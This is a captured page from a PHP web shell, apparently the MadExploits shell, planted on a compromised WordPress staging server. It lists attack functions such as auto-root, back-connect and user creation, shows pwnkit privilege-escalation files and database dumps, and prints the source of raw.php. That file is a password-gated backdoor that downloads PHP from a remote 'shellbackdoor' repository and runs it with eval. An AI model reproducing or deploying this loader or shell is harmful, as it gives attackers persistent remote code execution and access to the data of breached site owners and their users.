Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.139.70.69
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
knowledgebase /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxrwxrwx
wp-content
[ DIR ]
drwxrwxrwx
wp-includes
[ DIR ]
drwxrwxrwx
.htaccess
523
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.maintenance
33
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
googlec9019d128b9c9a90.html
53
B
-rw-r--r--
index.php
405
B
-rwxrwxrwx
knowledgedb_stage_12mar2024.sq...
100.33
MB
-rw-r--r--
knowledgedb_stage_13nov2024.sq...
134.12
MB
-rw-r--r--
knowledgedb_stage_25july2024.s...
78.34
MB
-rw-r--r--
knowledgedb_stage_29082024.sql
83.33
MB
-rw-r--r--
license.txt
19.45
KB
-rwxrwxrwx
okta.php
12.29
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
raw.php
2.45
KB
-rw-r--r--
readme.html
7.23
KB
-rwxrwxrwx
wp-activate.php
7.04
KB
-rwxrwxrwx
wp-blog-header.php
351
B
-rwxrwxrwx
wp-comments-post.php
2.27
KB
-rwxrwxrwx
wp-config-sample.php
2.93
KB
-rwxrwxrwx
wp-config.php
3.73
KB
-rwxrwxrwx
wp-cron.php
5.51
KB
-rwxrwxrwx
wp-links-opml.php
2.54
KB
-rwxrwxrwx
wp-load.php
3.83
KB
-rwxrwxrwx
wp-login.php
48.28
KB
-rwxrwxrwx
wp-mail.php
8.34
KB
-rwxrwxrwx
wp-settings.php
25
KB
-rwxrwxrwx
wp-signup.php
33.58
KB
-rwxrwxrwx
wp-trackback.php
4.77
KB
-rwxrwxrwx
xmlrpc.php
3.16
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : raw.php
<?php // Function to check if the user is logged in based on the presence of a valid cookie function is_logged_in() { return isset($_COOKIE['user_id']) && $_COOKIE['user_id'] === 'user123'; // Ganti 'user123' dengan nilai yang sesuai } // Check if the user is logged in before executing the content if (is_logged_in()) { // Function to get URL content (similar to your previous code) function geturlsinfo($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists('file_get_contents')) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } $a = geturlsinfo('https://raw.githubusercontent.com/Outsiders289/shellbackdoor/main/lo.php'); eval('?>' . $a); } else { // Display login form if not logged in if (isset($_POST['password'])) { $entered_password = $_POST['password']; $hashed_password = '9c5b3082eae2c54711bb99f361f58073'; // Replace this with your MD5 hashed password if (md5($entered_password) === $hashed_password) { // Password is correct, set a cookie to indicate login setcookie('user_id', 'user123', time() + 3600, '/'); // Ganti 'user123' dengan nilai yang sesuai } else { // Password is incorrect echo "Incorrect password. Please try again."; } } ?> <!DOCTYPE html> <html> <head> <title>SEMPAK BAPAKMU</title> </head> <body> <form method="POST" action=""> <label for="password">Admin:</label> <input type="password" id="password" name="password"> <input type="submit" value="Login"> </form> </body> </html> <?php } ?>
Close